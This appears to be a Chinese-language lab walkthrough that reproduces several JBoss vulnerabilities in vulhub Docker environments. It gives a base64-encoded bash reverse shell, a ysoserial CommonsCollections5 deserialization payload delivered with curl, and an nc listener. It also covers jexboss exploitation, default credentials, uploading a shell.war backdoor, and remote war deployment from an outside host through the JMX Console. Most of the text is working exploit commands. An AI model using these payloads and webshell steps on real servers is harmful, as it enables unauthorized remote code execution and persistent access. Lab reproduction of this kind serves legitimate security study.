CVE-2015-7501
步骤一:环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
docker ps
步骤二:POC,访问地址
http://192.168.10.190:8080/invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞
步骤三:下载 ysoserial ⼯具进⾏漏洞利⽤
GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.190/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser
步骤四:服务器设置监听得端⼝
nc -lvvp 6666
步骤五:执⾏命令
curl 192.168.10.190:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
反弹成功
CVE-2017-7504
步骤一:
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
步骤二:访问漏洞地址
http://192.168.10.190:8080/jbossmq-httpil/HTTPServerILServlet
步骤三:获取shell
python3 jexboss.py -u http://192.168.10.190:8080
CVE-2017-12149
步骤一:环境搭建
cd vulhub/jboss/CVE-2017-12149
docker-compose up -d
步骤二:漏洞复现
步骤三:验证是否存在漏洞 , 访问
http://192.168.10.190:8080/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化
步骤四:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可:
Administration Console弱⼝令
步骤一:环境部署
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
密码文件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
步骤二:登录
http://192.168.10.190:8080/admin-console/login.seam
步骤三:点击web应⽤,上传后⻔ shell.war
上传
步骤四:连接WebShell
http://192.168.10.190:8080/shell/shell.jsp
⾼版本JMX Console未授权
步骤一:环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
步骤二:
http://192.168.10.190:8080/jmx-console/
admin vulhub
步骤二:本地搭建部署点
在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer
步骤三:进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署
步骤四:输⼊Invoke
http://114.55.130.115/shell.war
步骤五:连接Webshell
http://192.168.10.190:8080/shell/shell.jsp
低版本JMX Console未授权
步骤一:部署环境
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
步骤二:进行登录
admin admin
步骤三:然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)
步骤四:找到⻚⾯中的void addURL() 选项远程加载war包来部署。
http://114.55.130.115/shell.war
步骤五:webshell连接
http://192.168.10.190:8080/shell/shell.jsp